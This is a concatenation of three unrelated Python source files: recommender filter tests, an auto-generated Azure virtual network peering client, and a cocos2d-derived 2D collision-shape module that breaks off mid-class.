            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": {{"$lt": "{0}"}}}}'.format(
                one_hour_before.isoformat()),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.eq_(len(filtered_products), 0)
        # $lt one hour after "now": both should pass.
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": {{"$lt": "{0}"}}}}'.format(
                one_hour_after.isoformat()),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.eq_(len(filtered_products), 2)
        # NOTE(review): exact duplicate of the "$lt one hour before" case
        # above -- possibly a copy-paste slip (cf. the same pattern in
        # test_pre_filter_with_dates). TODO confirm intended variant.
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": {{"$lt": "{0}"}}}}'.format(
                one_hour_before.isoformat()),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.eq_(len(filtered_products), 0)
        # Consistent range (before, after): both should pass.
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": {{"$gt": "{0}", "$lt": "{1}"}}}}'.format(
                one_hour_before.isoformat(), one_hour_after.isoformat()),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.eq_(len(filtered_products), 2)
        # Contradictory range ($lt before AND $gt after): empty result.
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": {{"$lt": "{0}", "$gt": "{1}"}}}}'.format(
                one_hour_before.isoformat(), one_hour_after.isoformat()),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.eq_(len(filtered_products), 0)
def _check_empty_filter_returning_all_products(self, custom_settings, intended_count, target_user):
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string="{}",
algorithm=self.algorithm)
recommender = session.get_recommender()
filter_count = len(recommender.recommend(1000))
nose.tools.ok_(intended_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(intended_count, filter_count,
'An empty filter should bring all products total({0}), returned({1})'.format(
intended_count, filter_count))
def _check_result_is_none_for_bad_filter(self, strategy):
target_user = "u_tec_1"
custom_settings = {
'filter_strategy': strategy
}
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "xxxx"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(1000)
nose.tools.eq_(len(filtered_products), 0)
def _check_language_filter(self, strategy):
product_count = self.db_proxy.get_product_model_count()
target_user = "u_tec_1"
custom_settings = {
'filter_strategy': strategy
}
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
algorithm=self.algorithm)
recommender = session.get_recommender()
product_ids = [product_id for _, product_id in recommender.recommend(1000)]
products = {product_id for product_id, product in
self.db_proxy.fetch_product_models(product_ids=product_ids,
max_date=session.get_present_date()).items() if
product.get_attribute("language") == "portuguese"}
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "portuguese"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(1000)
filtered_product_ids = [product_id for _, product_id in filtered_products]
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.ok_(
products.issubset(filtered_product_ids),
'A filtered request should only bring the products that match the filter requirements,'
' total({0}), returned({1})'.format(len(product_ids), len(filtered_product_ids)))
def _check_number_of_filtered_products(self, intended_count, strategy):
custom_settings = {
'filter_strategy': strategy
}
product_count = self.db_proxy.get_product_model_count()
target_user = "u_filter_1"
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(len(filtered_products), intended_count)
def _check_pre_and_pos_filters_match(self, filter_string, n_recommendations):
target_user = "u_tec_1"
custom_settings = {
'filter_strategy': ctx.BEFORE_SCORING,
'previous_consumption_factor': 0
}
session = tests.init_session(custom_settings,
context_filter_string=filter_string,
user_id=target_user,
algorithm=self.algorithm)
pre_filtered_candidates_count = len(session.filtered_products)
# sanity check
nose.tools.ok_(pre_filtered_candidates_count > 0, "Weak test. No pre-filtered candidate products.")
recommender = session.get_recommender()
recommendation_with_pre_filter = recommender.recommend(n_recommendations)
ranked_products_pre_filter = [r[1] for r in recommendation_with_pre_filter]
custom_settings = {
'filter_strategy': ctx.AFTER_SCORING,
'previous_consumption_factor': 0
}
session = tests.init_session(custom_settings,
context_filter_string=filter_string,
user_id=target_user,
algorithm=self.algorithm)
recommender = session.get_recommender()
recommendation_with_pos_filter = recommender.recommend(n_recommendations)
ranked_products_pos_filter = [r[1] for r in recommendation_with_pos_filter]
nose.tools.eq_(ranked_products_pre_filter[:pre_filtered_candidates_count],
ranked_products_pos_filter[:pre_filtered_candidates_count],
"Recommendation lists for pre- and pos-filters do not match")
def _check_basic_and_filters(self, intended_count, strategy):
custom_settings = {
'filter_strategy': strategy
}
product_count = self.db_proxy.get_product_model_count()
target_user = "u_filter_1"
date = self.session_context.get_present_date()
date_str = date.isoformat()
context_filter_string = '{"$and": [{"language": "german"}, {"date": "' + date_str + '"}]}'
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string=context_filter_string,
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(len(filtered_products), intended_count)
def _check_basic_or_filters(self, intended_count, strategy):
custom_settings = {
'filter_strategy': strategy
}
product_count = self.db_proxy.get_product_model_count()
target_user = "u_filter_1"
date = self.session_context.get_present_date()
date_str = date.isoformat()
context_filter_string = '{"$or": [{"language": "german"}, {"date": "' + date_str + '"}]}'
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string=context_filter_string,
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(len(filtered_products), intended_count)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class VirtualNetworkPeeringsOperations(object):
    """VirtualNetworkPeeringsOperations operations.
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    :ivar api_version: Client API version. Constant value: "2017-11-01".
    """
    # NOTE: AutoRest-generated code -- manual edits will be lost on regeneration.
    models = models
    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        # Pinned service API version; sent as the 'api-version' query parameter.
        self.api_version = "2017-11-01"
        self.config = config
    def _delete_initial(
            self, resource_group_name, virtual_network_name, virtual_network_peering_name, custom_headers=None, raw=False, **operation_config):
        # Single-shot DELETE request; the public delete() wraps this in an LRO poller.
        # Returns None (or ClientRawResponse when raw=True).
        # Construct URL
        url = self.delete.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
            'virtualNetworkPeeringName': self._serialize.url("virtual_network_peering_name", virtual_network_peering_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            # Per-request correlation id for service-side tracing.
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request
        request = self._client.delete(url, query_parameters)
        response = self._client.send(request, header_parameters, stream=False, **operation_config)
        if response.status_code not in [200, 202, 204]:
            # Any other status is surfaced as a CloudError carrying the service request id.
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
    def delete(
            self, resource_group_name, virtual_network_name, virtual_network_peering_name, custom_headers=None, raw=False, polling=True, **operation_config):
        """Deletes the specified virtual network peering.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param virtual_network_name: The name of the virtual network.
        :type virtual_network_name: str
        :param virtual_network_peering_name: The name of the virtual network
         peering.
        :type virtual_network_peering_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Kick off the operation with raw=True so the poller gets the raw response.
        raw_result = self._delete_initial(
            resource_group_name=resource_group_name,
            virtual_network_name=virtual_network_name,
            virtual_network_peering_name=virtual_network_peering_name,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )
        def get_long_running_output(response):
            # DELETE has no body to deserialize; returns None unless raw was requested.
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response
        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        # Select the polling strategy: default ARM polling, none, or a caller-supplied object.
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'}
    def get(
            self, resource_group_name, virtual_network_name, virtual_network_peering_name, custom_headers=None, raw=False, **operation_config):
        """Gets the specified virtual network peering.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param virtual_network_name: The name of the virtual network.
        :type virtual_network_name: str
        :param virtual_network_peering_name: The name of the virtual network
         peering.
        :type virtual_network_peering_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: VirtualNetworkPeering or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeering
         or ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.get.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
            'virtualNetworkPeeringName': self._serialize.url("virtual_network_peering_name", virtual_network_peering_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request
        request = self._client.get(url, query_parameters)
        response = self._client.send(request, header_parameters, stream=False, **operation_config)
        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        # Deserialize the body into the model type on success.
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('VirtualNetworkPeering', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'}
    def _create_or_update_initial(
            self, resource_group_name, virtual_network_name, virtual_network_peering_name, virtual_network_peering_parameters, custom_headers=None, raw=False, **operation_config):
        # Single-shot PUT request; the public create_or_update() wraps this in an LRO poller.
        # Construct URL
        url = self.create_or_update.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
            'virtualNetworkPeeringName': self._serialize.url("virtual_network_peering_name", virtual_network_peering_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct body
        body_content = self._serialize.body(virtual_network_peering_parameters, 'VirtualNetworkPeering')
        # Construct and send request
        request = self._client.put(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, stream=False, **operation_config)
        if response.status_code not in [200, 201]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        # 200 (updated) and 201 (created) both carry a VirtualNetworkPeering body.
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('VirtualNetworkPeering', response)
        if response.status_code == 201:
            deserialized = self._deserialize('VirtualNetworkPeering', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized
    def create_or_update(
            self, resource_group_name, virtual_network_name, virtual_network_peering_name, virtual_network_peering_parameters, custom_headers=None, raw=False, polling=True, **operation_config):
        """Creates or updates a peering in the specified virtual network.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param virtual_network_name: The name of the virtual network.
        :type virtual_network_name: str
        :param virtual_network_peering_name: The name of the peering.
        :type virtual_network_peering_name: str
        :param virtual_network_peering_parameters: Parameters supplied to the
         create or update virtual network peering operation.
        :type virtual_network_peering_parameters:
         ~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeering
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns VirtualNetworkPeering
         or ClientRawResponse<VirtualNetworkPeering> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeering]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeering]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Kick off the operation with raw=True so the poller gets the raw response.
        raw_result = self._create_or_update_initial(
            resource_group_name=resource_group_name,
            virtual_network_name=virtual_network_name,
            virtual_network_peering_name=virtual_network_peering_name,
            virtual_network_peering_parameters=virtual_network_peering_parameters,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )
        def get_long_running_output(response):
            # Final poll result is deserialized into the model type.
            deserialized = self._deserialize('VirtualNetworkPeering', response)
            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response
            return deserialized
        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        # Select the polling strategy: default ARM polling, none, or a caller-supplied object.
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'}
    def list(
            self, resource_group_name, virtual_network_name, custom_headers=None, raw=False, **operation_config):
        """Gets all virtual network peerings in a virtual network.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param virtual_network_name: The name of the virtual network.
        :type virtual_network_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of VirtualNetworkPeering
        :rtype:
         ~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeeringPaged[~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeering]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def internal_paging(next_link=None, raw=False):
            # Closure invoked by the paged iterator: builds the first-page URL,
            # then follows the service-provided next_link for subsequent pages.
            if not next_link:
                # Construct URL
                url = self.list.metadata['url']
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
            else:
                # next_link already embeds all query parameters.
                url = next_link
                query_parameters = {}
            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
            # Construct and send request
            request = self._client.get(url, query_parameters)
            response = self._client.send(
                request, header_parameters, stream=False, **operation_config)
            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp
            return response
        # Deserialize response
        deserialized = models.VirtualNetworkPeeringPaged(internal_paging, self._deserialize.dependencies)
        if raw:
            header_dict = {}
            client_raw_response = models.VirtualNetworkPeeringPaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response
        return deserialized
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings'}
| |
# coding: utf-8
# Copyright (c) 2013 Jorge Javier Araya Navarro <jorgean@lavabit.org>
#
# This file is free software: you may copy, redistribute and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# cocos2d
# Copyright (c) 2008-2012 Daniel Moisset, Ricardo Quesada, Rayentray Tappa,
# Lucio Torre
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of cocos2d nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
__docformat__ = 'restructuredtext'
import operator as op
import math
import summa.euclid as eu
###### interfaces, abstract base clases ######################################
# Cshape reference interface
class Cshape(object):
    """
    Abstract interface for a geometric shape in 2D space.

    A Cshape can answer questions about proximity or intersection with
    other shapes.  Implementations are free to restrict the type of
    geometrical shapes they will accept as 'other', for example only
    circles or only axis-aligned rectangles.

    All methods here are stubs that return None; concrete subclasses
    (see CircleShape, AARectShape) provide the real behavior.
    """
    def overlaps(self, other):
        """
        Returns True if overlapping other, False otherwise.

        :rtype: bool
        """
        pass
    def distance(self, other):
        """
        Returns a float, the distance from itself to other.

        Not necessarily an euclidean distance; it is the distance
        between the shapes' boundaries.

        :rtype: float
        """
        pass
    def near_than(self, other, near_distance):
        """
        Returns True if distance(self, other) <= near_distance.

        :rtype: bool
        """
        pass
    def touches_point(self, x, y):
        """
        Returns True if the point (x, y) overlaps the shape, False otherwise.

        :rtype: bool
        """
        pass
    def fits_in_box(self, packed_box):
        """
        Returns True if the shape fully fits into the axis aligned
        rectangle defined by packed_box, False otherwise.

        :Parameters:
            `packed_box` : 4-tuple of floats
                An axis aligned rectangle expressed as (minx, maxx, miny, maxy)

        :rtype: bool
        """
        pass
    def minmax(self):
        """
        Returns the smallest axis aligned rectangle that contains all
        shape points, expressed as a 4-tuple of floats
        (minx, maxx, miny, maxy).

        Such a rectangle is also known as the Axis Aligned Bounding Box
        (AABB) for the shape.

        :rtype: 4-tuple of floats
        """
        pass
    def copy(self):
        """
        Returns a copy of itself.

        :rtype: Cshape
        """
        pass
# collision manager interface
class CollisionManager(object):
    """
    Answers questions about proximity or collision with known objects.

    After instantiation, or after calling its 'clear' method, the instance
    doesn't know any object.
    An object is made known to the CollisionManager instance by calling its
    'add' method with the object instance.

    Example questions are:

    - which known objects collide with <this object> ?
    - which known objects are nearer than 6.0 from <this object> ?

    Note that explicit objects in the question (call) don't need to be known
    to the collision manager answering the question.
    If the explicit object indeed is known, then it is omitted in the answer
    as a trivial case.

    There can be multiple CollisionManager instances in the same scope, and
    an object can be known to many collision managers at the same time.

    Objects that can be known or can be presented to a CollisionManager in
    a question must comply with:

    - obj has a member called cshape
    - obj.cshape supports the interface Cshape

    Such an object is called 'a collidable' in the documentation, and when
    'obj' or 'other' is seen in the code you can assume it means collidable.

    As a limitation imposed by the current Cshape implementations, all the
    collidables that interact with a particular instance of CollisionManager
    must share the same concrete Cshape subclass: for example, all objects
    should have a CircleShape cshape, or all objects should have an
    AARectShape cshape.

    The known objects collective for each CollisionManager instance is
    manipulated by calling the methods

    - clear() \: forgets all objects and empties internal data structures
    - add(obj) \: remembers obj as a known object
    - remove_tricky(obj) \: forgets obj

    When objects are made known to a collision manager, internal data
    structures are updated based on the obj.cshape value at the 'add' moment.
    In particular, the obj.cshape indirectly tells where in the internal
    structures certain info will be stored.
    Later, the internal data structures are used to accelerate answers.
    This means that modifying obj.cshape after an 'add' can produce a memory
    leak at the next 'remove_tricky', and that in the same situation some
    answers can be partially wrong.
    What type of wrong? It can sometimes miss a collision with a known
    object that changed its cshape.
    It is user code responsibility to drive the known objects update when
    obj.cshape values change.

    Common use patterns that are safe and efficient:

    When most of the known objects update cshape each frame
        You do::

            # updating collision info
            collision_manager.clear() # fast, no leaks even if changed cshapes
            for actor in moving_actors:
                collision_manager.add(actor)

            # game logic
            # do what you need, but defer changes in cshape to next block
            # by example
            for actor in moving_actors:
                actor.new_pos = actor.cshape.center + dt * vel
            # other logic that potentially needs collision info;
            # it will be accurate because you have not changed cshapes
            ...

            # update cshapes for next frame
            for actor in moving_actors:
                actor.cshape.center = actor.new_pos

        Example actors for this case are player, enemies, soldiers.

    All of the known objects don't change cshapes
        - At level start you add all objects
        - When an actor reaches end of life use 'remove_tricky' to make it
          not known; no problem because its cshape has not changed

        Example actors for this case are food, coins, trees, rocks.
    """
    def add(self, obj):
        """
        Makes obj a known entity.
        """
        pass
    def remove_tricky(self, obj):
        """
        *(obj should have the same .cshape value as when it was added)*

        Makes the collision manager forget about obj, so no further query
        will return obj.
        obj is required to be a known object.
        """
    def clear(self):
        """
        Empties the known set.
        """
        pass
    def they_collide(self, obj1, obj2):
        """
        Returns True if obj1 overlaps obj2, False otherwise.
        obj1, obj2 are not required to be known objects.
        """
        pass
    def objs_colliding(self, obj):
        """
        Returns a container with the known objects that overlap obj,
        excluding obj itself.
        obj is not required to be a known object.
        """
        pass
    def iter_colliding(self, obj):
        """
        A lazy iterator over objects colliding with obj; allows to spare
        some CPU when the loop processing the collisions breaks before
        exhausting the collisions.
        obj is not required to be a known object.

        Usage::

            for other in collision_manager.iter_colliding(obj):
                # process event 'obj touches other'
        """
        pass
    def any_near(self, obj, near_distance):
        """
        Returns None if no known object (except obj itself) is nearer than
        near_distance, else an arbitrary known object with distance less
        than near_distance.
        obj is not required to be a known object.
        """
        pass
    def objs_near(self, obj, near_distance):
        """
        Returns a container with the objects known by the collision manager
        that are at distance to obj less or equal than near_distance,
        excluding obj itself.
        Notice that it includes the ones colliding with obj.
        obj is not required to be a known object.
        """
        pass
    def objs_near_wdistance(self, obj, near_distance):
        """
        Returns a list of (other, distance) pairs with all the known
        objects at distance less or equal than near_distance to obj,
        except obj itself.
        Notice that it includes the ones colliding with obj.
        obj is not required to be a known object.
        If the game logic wants the list ordered by ascending distances,
        use ranked_objs_near instead.
        """
        pass
    def ranked_objs_near(self, obj, near_distance):
        """
        Same as objs_near_wdistance but the list is ordered by increasing
        distance.
        obj is not required to be a known object.
        """
        pass
    def iter_all_collisions(self):
        """
        Iterator that exposes all collisions between known objects.
        At each step it will yield a pair (obj, other).
        If (obj1, obj2) is seen when consuming the iterator, then
        (obj2, obj1) will not be seen.
        In other words, 'obj1 collides with obj2' means (obj1, obj2) or
        (obj2, obj1) will appear in the iterator output, but not both.
        """
    def knows(self, obj):
        """
        Returns True if obj was added to the collision manager, False
        otherwise.
        Used for debug and testing.
        """
        pass
    def known_objs(self):
        """
        Returns a set with all the objects known by the CollisionManager.
        Used for debug and testing.
        """
        pass
    def objs_touching_point(self, x, y):
        """
        Returns a container with the known objects touching point (x, y).
        Useful for mouse picking.
        """
        pass
    def objs_into_box(self, minx, maxx, miny, maxy):
        """
        Returns a container with the known objects that fully fit into the
        axis aligned rectangle defined by the params.
        Useful for elastic box selection.
        """
        pass
###### Cshape implementations #################################################
class CircleShape(object):
    """
    Cshape implementation using discs as the geometric shape.

    Distance is the euclidean distance between boundaries.
    See Cshape for the general class and method documentation.
    """
    def __init__(self, center, r):
        """
        :Parameters:
            `center` : euclid.Vector2
                disc center
            `r` : float
                disc radius
        """
        self.center = center
        self.r = r

    def overlaps(self, other):
        # discs intersect when the center separation is below the radii sum
        return abs(self.center - other.center) < self.r + other.r

    def distance(self, other):
        # gap between the two boundaries, clamped to zero when overlapping
        gap = abs(self.center - other.center) - self.r - other.r
        return gap if gap > 0.0 else 0.0

    def near_than(self, other, near_distance):
        return abs(self.center - other.center) <= self.r + other.r + near_distance

    def touches_point(self, x, y):
        return abs(self.center - (x, y)) <= self.r

    def fits_in_box(self, packed_box):
        minx, maxx, miny, maxy = packed_box
        r = self.r
        return ((minx + r) <= self.center[0] <= (maxx - r) and
                (miny + r) <= self.center[1] <= (maxy - r))

    def minmax(self):
        cx = self.center[0]
        cy = self.center[1]
        r = self.r
        return (cx - r, cx + r, cy - r, cy + r)

    def copy(self):
        return CircleShape(eu.Vector2(*self.center), self.r)
class AARectShape(object):
    """
    Cshape implementation using axis-aligned rectangles as the shape.

    Distance is not the euclidean distance but the rectangular or max-min
    distance, max( min(x0 - x1), min(y0 - y1) : (xi, yi) in recti ).
    Good when actors don't rotate.
    See Cshape for the general class and method documentation.
    """
    def __init__(self, center, half_width, half_height):
        """
        :Parameters:
